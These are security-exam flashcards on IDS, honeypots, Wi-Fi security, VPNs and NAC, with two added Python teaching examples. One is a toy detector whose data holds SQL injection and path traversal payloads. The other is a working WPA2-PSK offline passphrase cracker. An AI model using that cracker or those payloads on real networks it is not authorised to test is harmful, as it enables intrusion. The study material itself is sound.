19 Cards in this Set


Which of the following network tools includes sniffing capabilities?


A. IDS


B. WAP


C. VPN


D. NAC

Correct Answer: A. Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) include sniffing capabilities that allow them to inspect packet streams for malicious activity. None of the other tools inspect packets. A wireless access point (WAP) provides access to a wired network for wireless devices. A virtual private network (VPN) provides access to an internal network for remote users. A network access control (NAC) system inspects clients to ensure they meet minimum security requirements before granting them network access.

A HIDS reported a vulnerability on a system using an assigned vulnerability identification number. After researching the number on the vendor's web site, you identify the recommended solution and begin applying it. What type of HIDS is in use?


A. Network-based


B. Signature-based


C. Heuristic-based


D. Anomaly-based

Correct Answer: B. If the issue has an assigned vulnerability identification number, it is a known issue, so the detection is signature-based. A host-based intrusion detection system (HIDS) runs on an individual host and is by definition not network-based. A heuristic-based (or anomaly-based) detection system catches issues that were not previously known, so it would not report a catalogued identifier.

Management is concerned about malicious activity on your network and wants to implement a security control that will detect unusual traffic on the network. Which of the following is the BEST choice to meet this goal?


A. Network firewall


B. Signature-based IDS


C. Anomaly-based IDS


D. Honeypot

Correct Answer: C. An anomaly-based (also called heuristic- or behavior-based) detection system compares current activity with a previously created baseline and alerts on deviations from it. A network firewall blocks or allows traffic based on rules, but does not detect unusual traffic. Signature-based systems match known patterns, much like antivirus software, so they cannot flag traffic that is merely unusual. A honeypot is a server designed to look valuable to an attacker and can divert attacks, but it is not a general-purpose detection control for the network.

Administrators have noticed an increased workload recently. Which of the following can cause an increased workload from incorrect reporting?


A. False Negatives


B. False Positives


C. Separation of duties


D. Signature-based IDS

Correct Answer: B. False positives increase the workload because they raise alerts for events that are not actually attacks, and each one still has to be investigated. A false negative is an actual attack that goes unreported, so it doesn't increase the workload because administrators are unaware of the attack. Separation of duties ensures a single person can't control an entire process, so it is unrelated to the workload. A signature-based intrusion detection system (IDS) doesn't necessarily cause an increased workload unless it has a high incidence of false positives.

A security company wants to identify and learn about current and new attack methodologies. Which of the following is the BEST choice to meet this objective?


A. Pen test


B. HIDS


C. Honeypot


D. Firewall logs

Correct Answer: C. A honeypot is a server designed to look valuable to an attacker. Because no legitimate user has a reason to touch it, any interaction with it is suspect, and it can help administrators learn about zero-day exploits, or previously unknown attacks. Security personnel perform a pen test (penetration test) to determine whether attackers can exploit existing vulnerabilities, but a pen test only exercises techniques the testers already know. A host-based intrusion detection system (HIDS) attempts to detect intrusions on an individual host, but may not catch new methods used against the network. Firewall logs record connections, but don't identify new attack methods.

Of the following choices, what can you use to divert malicious attacks on your network away from valuable data to worthless fabricated data?


A. IPS


B. Proxy Server


C. Web application firewall


D. Honeypot

Correct Answer: D. A honeypot can divert malicious attacks to a harmless area of your network, away from production servers holding valid data and toward worthless fabricated data. An intrusion prevention system (IPS) can block attacks, but it doesn't divert them. A proxy server can filter and cache web content, but doesn't divert attacks. A web application firewall (WAF) is an additional firewall designed to protect a web application; it blocks rather than diverts.

Your network IDS recently detected an attack on a server. Upon investigation, you discover that the IDS does not have a signature on this attack. Instead, the IDS detected it using a heuristic analysis. Of the following choices, what is the MOST likely category of this attack?


A. Definition


B. CVE


C. Zero-day


D. Phishing

Correct Answer: C. Heuristic analysis has the best chance of detecting zero-day attacks. A zero-day attack is one that is unknown to vendors; because this attack has no signature, it is most likely previously unknown. Definition-based intrusion detection systems (IDSs) are the same as signature-based IDSs. Many signatures are based on entries in the Common Vulnerabilities and Exposures (CVE) list, which catalogues known vulnerabilities, so a CVE-based signature would have matched. A phishing attack arrives by email and targets users, not a server.
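The IDS cards above (sniffing packets, signature-based versus anomaly-based detection, false positives raising the workload, and heuristics catching an attack with no signature) are easier to see side by side in code. The following is an added example, not part of the original flashcards: a toy detector run over constructed web access-log lines. The signature rules, the baseline-plus-k-standard-deviations anomaly rule, the host addresses and the log lines are all assumptions made up for the example, not a real capture or a real product's rule set.

```python
"""Signature-based versus anomaly-based detection over constructed access-log lines."""
import re
import statistics
from collections import Counter
from urllib.parse import unquote

# Assumption: Apache/nginx combined-log style lines. Every line in this file is
# constructed for the example; none comes from a real capture.
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

# Signature (definition-based) rules: known-bad patterns only.
SIGNATURES = {
    "sqli-union": re.compile(r"union\s+select", re.IGNORECASE),
    "path-traversal": re.compile(r"\.\./"),
}


def make_lines(host: str, count: int, path: str = "/index.html") -> list:
    """Build `count` constructed access-log lines from `host` requesting `path`."""
    return [
        f'{host} - - [10/Oct/2023:13:55:{i % 60:02d} +0000] "GET {path} HTTP/1.1" 200 512'
        for i in range(count)
    ]


def parse(line: str):
    """Return (host, URL-decoded path) or (None, None) for a line that does not parse."""
    m = LOG_RE.match(line)
    return (m.group("host"), unquote(m.group("path"))) if m else (None, None)


def signature_alerts(lines):
    """Return (rule, host) for every line that matches a known signature."""
    hits = []
    for line in lines:
        host, path = parse(line)
        if path is None:
            continue
        for name, pattern in SIGNATURES.items():
            if pattern.search(path):
                hits.append((name, host))
    return hits


def anomaly_alerts(current, baseline, k: float):
    """Flag hosts whose request count exceeds the baseline mean + k standard deviations.

    The baseline is a window of known-normal traffic; k is the sensitivity knob.
    """
    base_counts = list(Counter(parse(line)[0] for line in baseline).values())
    mean, sd = statistics.mean(base_counts), statistics.pstdev(base_counts)
    current_counts = Counter(parse(line)[0] for line in current)
    return sorted(host for host, n in current_counts.items() if n > mean + k * sd)


# Baseline window: eight hosts behaving normally (10 to 13 requests each).
BASELINE = [
    line
    for i, n in enumerate([10, 11, 12, 10, 13, 11, 12, 10])
    for line in make_lines(f"10.0.0.{i + 1}", n)
]

# Current window: the same hosts, plus a busy but legitimate monitoring probe,
# one attack a signature knows about, and one attack no signature knows about
# (a SQL tautology rather than UNION SELECT), sent in a burst.
CURRENT = (
    BASELINE
    + make_lines("10.0.0.50", 18, "/healthz")
    + make_lines("10.0.0.7", 1, "/static/../../etc/passwd")
    + make_lines("10.0.0.99", 40, "/login?user=admin%27%20OR%20%271%27%3D%271")
)


def run(k: float = 3.0) -> dict:
    """Run both detectors over the current window with anomaly sensitivity k."""
    return {
        "signature": signature_alerts(CURRENT),
        "anomaly": anomaly_alerts(CURRENT, BASELINE, k),
    }


if __name__ == "__main__":
    for k in (3.0, 8.0):
        print(f"k={k}:", run(k))
```

With k=3 the anomaly detector catches the burst from 10.0.0.99 that the signatures miss, but it also flags the monitoring probe at 10.0.0.50: a false positive that someone has to investigate. Raising k to 8 removes that false positive at the cost of sensitivity; that trade-off is what tuning a heuristic IDS means in practice. The signature rule, by contrast, only ever fires on the traversal request from 10.0.0.7, the one attack it has a definition for.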

You need to provide connectivity between two buildings without running any cables. You decide to use two WAPs and a high-gain directional antenna. Which of the following antennas is the BEST choice to meet this need?


A. Yagi


B. Omni


C. Isotropic


D. Dipole

Correct Answer: A. A Yagi antenna is a high-gain directional antenna with a very narrow radiation pattern and is an ideal choice for a point-to-point link between two buildings. An isotropic antenna is a theoretical reference that radiates equally in all directions. Omnidirectional and dipole antennas approximate an isotropic antenna, but have stronger gain horizontally than vertically when mounted vertically, and they spread the signal around rather than focusing it toward the other building.

You are assisting a user in the implementation of a wireless network in his home. The wireless hardware he has requires the RC4 protocol. What type of security is BEST for this network?


A. WEP


B. WPA-TKIP


C. WPA-AES


D. WPA2 Enterprise

Correct Answer: B. Temporal Key Integrity Protocol (TKIP) uses RC4 and is compatible with older hardware, so Wi-Fi Protected Access (WPA) with TKIP is the best of the listed options for this hardware. Wired Equivalent Privacy (WEP) also uses RC4, but it is broken and should not be used. WPA with Advanced Encryption Standard (AES) is stronger, but it uses AES instead of RC4, so this hardware can't support it. Wi-Fi Protected Access II (WPA2) Enterprise requires an 802.1X authentication server and does not use RC4. Note that TKIP itself is deprecated and has known weaknesses; it is a stopgap until the RC4-only hardware is replaced, not a long-term choice.

You want to implement the STRONGEST level of security on a wireless network. Which of the following supports this goal?


A. Implementing WEP


B. Disabling SSID broadcast


C. Enabling MAC filtering


D. Implementing WPA2

Correct Answer: D. Wi-Fi Protected Access II (WPA2) provides the strongest level of security of the available answers. Wired Equivalent Privacy (WEP) is weak and should not be used. Disabling service set identifier (SSID) broadcast hides the network from casual users, but attackers can still discover it because the SSID is still included in plaintext in other frames. Attackers can bypass media access control (MAC) address filtering by sniffing an authorized client's MAC address and spoofing it. Neither hiding the SSID nor MAC filtering adds any cryptographic protection to the traffic.

You are planning to deploy a WLAN and you want to ensure it is secure. Which of the following provides the BEST security?


A. WEP Enterprise


B. WPA2 TKIP


C. SSID broadcast


D. WPA2 CCMP

Correct Answer: D. Wi-Fi Protected Access II (WPA2) with Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) provides the best security of those listed. Wired Equivalent Privacy (WEP) is not secure and has no Enterprise mode. CCMP (based on AES) is stronger than Temporal Key Integrity Protocol (TKIP), which is based on RC4 and deprecated. Service set identifier (SSID) broadcast means the network name is advertised in beacon frames; it doesn't provide any security either way. If SSID broadcast is disabled, the network is hidden from casual users, but attackers can still see the name in other frames.

Your organization is planning to implement a wireless network using WPA2 Enterprise. Of the following choices, what is required?


A. An authentication server with a digital certificate installed on the authentication server.


B. An authentication server with DHCP installed on the authentication server.


C. An authentication server with DNS installed on the authentication server.


D. An authentication server with WEP running on the access point.

Correct Answer: A. WPA2 Enterprise requires an 802.1X authentication server (typically RADIUS), and most implementations require a digital certificate installed on that server so clients can verify they are talking to the legitimate server before sending credentials. The network will likely have Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) services, but it isn't necessary to install them on the authentication server. Wired Equivalent Privacy (WEP) provides poor security and is not compatible with WPA2 Enterprise.

You are assisting a small business owner in setting up a public wireless hot spot for her customers. Which of the following actions is MOST appropriate for this hot spot?


A. Enabling Open System Authentication


B. Enabling MAC filtering


C. Disabling SSID broadcast


D. Installing Yagi antennas

Correct Answer: A. Open System Authentication is the best choice of those given for a public wireless hot spot. It doesn't require users to enter a preshared key or passphrase, and it doesn't require the business owner to give out this information. (It is the 802.11 authentication mode also used with Wired Equivalent Privacy (WEP); it's also possible to disable security for the hot spot entirely.) Media access control (MAC) address filtering would be very difficult to maintain for a constantly changing set of customers. Disabling service set identifier (SSID) broadcast would make it difficult for customers to find the wireless network, and a directional Yagi antenna isn't appropriate for a hot spot, which needs an omnidirectional antenna.

Homer is able to connect to his company's wireless network with his smartphone but not with his laptop computer. Which of the following is the MOST likely reason for this disparity?


A. His company's network has a MAC address filter in place.


B. His company's network has enabled SSID broadcast


C. His company's network has enabled CCMP


D. His company's network has enabled WPA2 Enterprise.

Correct Answer: A. A media access control (MAC) address filter allows (or blocks) devices based on their MAC addresses, so it is likely that the filter allows Homer's smartphone but not his laptop. Enabling service set identifier (SSID) broadcast makes the network easier for casual users to see, and disabling it does not block access, so neither setting explains the disparity. Wi-Fi Protected Access II (WPA2) and Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) both provide strong security, but they do not differentiate between devices.

Management asks you if you can modify the wireless network to prevent users from easily discovering it. Which of the following would you modify to meet this goal?


A. CCMP


B. WPA2 Enterprise


C. SSID broadcast


D. MAC address filter

Correct Answer: C. You can disable service set identifier (SSID) broadcast to prevent users from easily discovering the wireless network. None of the other methods hide the network. Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) provides stronger encryption for Wi-Fi Protected Access II (WPA2), and WPA2 Enterprise adds 802.1X authentication to the wireless network. Media access control (MAC) address filtering restricts which devices can connect. Keep in mind that disabling SSID broadcast only stops casual discovery; the SSID still appears in plaintext in other frames, so it is not a security control.

A war driver is capturing traffic from a wireless network. When an authorized client connects, the attacker is able to implement a brute force attack to discover the encryption key. What type of attack did this war driver use?


A. WPS attack


B. IV attack


C. Packet injection


D. WPA cracking

Correct Answer: D. A Wi-Fi Protected Access (WPA) cracking attack captures the traffic exchanged when a client connects (the four-way handshake) and then performs an offline brute force or dictionary attack against it to discover the preshared key. Wi-Fi Protected Setup (WPS) attacks also use brute force (against the WPS PIN), but do not need to wait for an authorized client to connect. Initialization vector (IV) attacks often use packet injection techniques to generate more traffic in Wired Equivalent Privacy (WEP) attacks.
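Why capturing one client's connection is enough for an offline attack is clearer when the key derivation is written out. The following is an added example, not part of the original flashcards: it implements the WPA2-PSK key schedule (PBKDF2 from passphrase and SSID to PMK, PRF-512 to PTK, HMAC-SHA1 MIC over the EAPOL-Key frame) and then runs a dictionary attack using only the values a war driver can sniff. There is no real capture here: the SSID, MAC addresses, nonces, EAPOL frame and word list are constructed in the script, and `sniff_handshake` stands in for the sniffer by having the "legitimate client" compute the MIC with the true passphrase.

```python
"""Offline WPA2-PSK dictionary attack against a (constructed) four-way handshake capture."""
import hashlib
import hmac
from typing import Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(N)||max(N))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_eapol2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 with the MIC field zeroed (the form the MIC is computed over).

    A real frame also carries the client's RSN IE in the key data; it is omitted here.
    """
    body = (
        b"\x02"                    # descriptor type: RSN
        + b"\x01\x0a"              # key info: version 2, pairwise, MIC bit set
        + b"\x00\x10"              # key length: 16 (CCMP)
        + (1).to_bytes(8, "big")   # replay counter
        + snonce                   # key nonce (SNonce)
        + b"\x00" * 16             # key IV
        + b"\x00" * 8              # key RSC
        + b"\x00" * 8              # key ID (reserved)
        + b"\x00" * 16             # key MIC, zeroed for computation
        + b"\x00\x00"              # key data length
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL version 1, type 3 (Key)


def sniff_handshake(passphrase: str) -> dict:
    """Stand-in for the sniffer. Only values visible on the air are returned; no key material."""
    ssid = "CoffeeShop-Guest"                 # constructed network name
    ap_mac = bytes.fromhex("001122334455")    # constructed addresses and nonces
    client_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    eapol2 = build_eapol2(snonce)
    # The legitimate client knows the passphrase and produces the MIC the attacker captures.
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac, "anonce": anonce,
            "snonce": snonce, "eapol2": eapol2, "mic": eapol_mic(ptk[:16], eapol2)}


def crack(hs: dict, wordlist) -> Optional[str]:
    """Offline attack: re-derive PMK -> PTK -> KCK -> MIC per candidate and compare with the sniffed MIC."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        ptk = derive_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol2"]), hs["mic"]):
            return candidate
    return None


WORDLIST = ["password", "12345678", "letmein123", "dragonfly2024", "qwertyuiop"]  # constructed

if __name__ == "__main__":
    print(crack(sniff_handshake("dragonfly2024"), WORDLIST))
```

Nothing in `crack` touches the network: once the SSID, the two MAC addresses, the two nonces and one MIC-bearing EAPOL frame are captured, every guess is checked locally, which is why the only real defence for a preshared key is a long, non-dictionary passphrase. The 4096 PBKDF2 iterations bound per SSID make the attack cost roughly one PBKDF2 computation per candidate; WPS PIN attacks and WEP IV attacks work differently and do not need this handshake at all.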

An attacker is able to access email contact lists on your smartphone. What type of attack is this?


A. Bluesnarfing


B. War Chalking


C. War Driving


D. Bluejacking

Correct Answer: A. Attackers are able to access data (including email contact lists) on a smartphone in a bluesnarfing attack. War chalking is the practice of marking the location of wireless networks. War driving is the practice of looking for wireless networks, often by driving around. Bluejacking is the practice of sending unsolicited messages to other Bluetooth devices.

Your organization is planning to implement a VPN and wants to ensure it is secure. Which of the following protocols is the BEST choice to use with the VPN?


A. HTTP


B. SFTP


C. IPsec


D. PPTP

Correct Answer: C. Internet Protocol Security (IPsec) is one of several protocols used to secure virtual private network (VPN) traffic and is the best choice of the available answers. Hypertext Transfer Protocol (HTTP) doesn't provide any security. Secure File Transfer Protocol (SFTP) secures file transfers over SSH, not VPN tunnels. Point-to-Point Tunneling Protocol (PPTP) is an older VPN protocol, but it is not as secure as IPsec.

An automated process isolated a computer in a restricted VLAN because the process noticed the computer's antivirus definitions were not up to date. What is the name of this process?


A. NFC


B. NIPS


C. NIDS


D. NAC

Correct Answer: D. Network access control (NAC) is a group of technologies that can inspect systems and control their access to a network. In this scenario, NAC placed the computer in a restricted virtual local area network (VLAN) to quarantine it until its antivirus definitions are brought up to date. Near field communication (NFC) refers to standards that allow mobile devices to communicate with each other at very short range and is not related to VLANs. Network-based intrusion prevention systems (NIPSs) and network-based intrusion detection systems (NIDSs) protect a network from intrusions, but they do not quarantine internal systems based on their patch or definition status.